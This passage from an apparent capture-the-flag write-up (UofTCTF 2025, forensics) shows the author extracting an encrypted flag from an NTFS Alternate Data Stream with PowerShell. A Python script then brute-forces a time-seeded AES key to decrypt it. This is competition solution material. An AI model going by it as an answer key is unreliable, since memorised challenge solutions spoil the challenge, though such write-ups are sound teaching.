<span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    main<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>When searching for the flag.enc file that contains the encrypted 
correct flag, I found that it was stored as an Alternate Data Stream (ADS) of flag.py.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 474px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 41.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/124b98823ab9f1edf625b4151490eccf/8ac56/image-20250112214145682.webp 240w,\n/static/124b98823ab9f1edf625b4151490eccf/01944/image-20250112214145682.webp 474w\"\n              sizes=\"(max-width: 474px) 100vw, 474px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/124b98823ab9f1edf625b4151490eccf/8ff5a/image-20250112214145682.png 240w,\n/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png 474w\"\n            sizes=\"(max-width: 474px) 100vw, 474px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png\"\n            alt=\"image-20250112214145682\"\n            title=\"image-20250112214145682\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I extracted the flag.enc bytes from the ADS using the following commands.</p>\n<div class=\"gatsby-highlight\" 
data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">Set<span class=\"token operator\">-</span>Content C<span class=\"token punctuation\">:</span>\\Users\\kash1064\\Downloads\\flag\\flag<span class=\"token punctuation\">.</span>enc <span class=\"token operator\">-</span>Encoding Byte <span class=\"token operator\">-</span>Value $a\nGet<span class=\"token operator\">-</span>Content C<span class=\"token punctuation\">:</span>\\Users\\kash1064\\Downloads\\flag\\flag<span class=\"token punctuation\">.</span>py<span class=\"token punctuation\">:</span>flag<span class=\"token punctuation\">.</span>enc <span class=\"token operator\">-</span>Encoding Byte <span class=\"token operator\">-</span>ReadCount <span class=\"token number\">0</span></code></pre></div>\n<p>This flag.enc is a concatenation of the 16-byte cipher.nonce and the encrypted ciphertext.</p>\n<p>Furthermore, reading the implementation in flag.py reveals that it uses a key generated with the current time as the seed for encryption.</p>\n<p>From the file timestamps within the archive, we can determine that this file was created on 2025/01/06, which means the encrypted data can likely be decrypted by brute-forcing the seconds.</p>\n<p>Ultimately, I obtained the correct flag with the following script.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span class=\"token keyword\">import</span> pad\n<span class=\"token keyword\">from</span> Crypto<span class=\"token 
punctuation\">.</span>Hash <span class=\"token keyword\">import</span> SHA256\n<span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">from</span> datetime <span class=\"token keyword\">import</span> datetime\n<span class=\"token keyword\">import</span> random\n\ndata <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x29\\xe6\\x91\\x01\\xb5\\x00\\xc3\\x83\\x1e\\xff\\x9a\\xfb\\x12\\xc7\\x6b\\x94\\xd4\\xf8\\x81\\x60\\x45\\x83\\x9e\\x60\\xa0\\x61\\x12\\x2e\\x8d\\x01\\xfa\\xf9\\x5e\\x55\\xb1\\x70\\xff\\xd0\\xdc\\xa3\\xdf\\x38\\xc5\\x72\\xf3\\xbd\\xbd\\xe8\\xfb\\xc4\\x4d\\x39\\x38\\xee\\x07\\x86\\xfc\"</span>\nnonce <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">:</span><span class=\"token number\">16</span><span class=\"token punctuation\">]</span>\nciphertext <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">assert</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>nonce<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\nbasetime <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>datetime<span class=\"token punctuation\">(</span><span class=\"token number\">2025</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span 
class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>timestamp<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Try every second of 2025/01/06 as the seed and rebuild the key the same way flag.py does</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span>basetime<span class=\"token punctuation\">,</span> basetime<span class=\"token operator\">+</span><span class=\"token punctuation\">(</span><span class=\"token number\">3600</span><span class=\"token operator\">*</span><span class=\"token number\">24</span><span class=\"token operator\">*</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    random<span class=\"token punctuation\">.</span>seed<span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span>\n    KEY <span class=\"token operator\">=</span> SHA256<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>getrandbits<span class=\"token punctuation\">(</span><span class=\"token number\">256</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>digest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    cipher <span class=\"token operator\">=</span> AES<span class=\"token 
punctuation\">.</span>new<span class=\"token punctuation\">(</span>KEY<span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_EAX<span class=\"token punctuation\">,</span> nonce<span class=\"token operator\">=</span>nonce<span class=\"token punctuation\">)</span>\n    plaintext <span class=\"token operator\">=</span> cipher<span class=\"token punctuation\">.</span>decrypt<span class=\"token punctuation\">(</span>ciphertext<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"u\"</span> <span class=\"token keyword\">and</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"o\"</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 830px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.416666666666667%; position: relative; bottom: 
0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAT0lEQVQI1w3GyQ5AMBRAUasmgmj7zGpsTRHx/193OasTuVDg3xb/dIyhZVh2Rn/Sz4Fpu/4frMeNNI44syS6JDU1udRUVYm1Bm00IoJSig8lvRnkBQJkgAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/195a2fc3de811a6d211c30b1874bd88b/8ac56/image-20250113213639016.webp 240w,\n/static/195a2fc3de811a6d211c30b1874bd88b/d3be9/image-20250113213639016.webp 480w,\n/static/195a2fc3de811a6d211c30b1874bd88b/b2a51/image-20250113213639016.webp 830w\"\n              sizes=\"(max-width: 830px) 100vw, 830px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/195a2fc3de811a6d211c30b1874bd88b/8ff5a/image-20250113213639016.png 240w,\n/static/195a2fc3de811a6d211c30b1874bd88b/e85cb/image-20250113213639016.png 480w,\n/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png 830w\"\n            sizes=\"(max-width: 830px) 100vw, 830px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png\"\n            alt=\"image-20250113213639016\"\n            title=\"image-20250113213639016\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>","fields":{"slug":"/ctf-uoftctf-2025-en","tagSlugs":["/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2025-01-13","description":"UoT CTF 2025 Writeup","tags":["Forensic (en)","English"],"title":"UoT CTF 2025 
Writeup","socialImage":{"publicURL":"/static/84cc1e0e692ca22f3e05e80e5d1959a5/ctf-uoftctf-2025.png"}}}},"pageContext":{"slug":"/ctf-uoftctf-2025-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}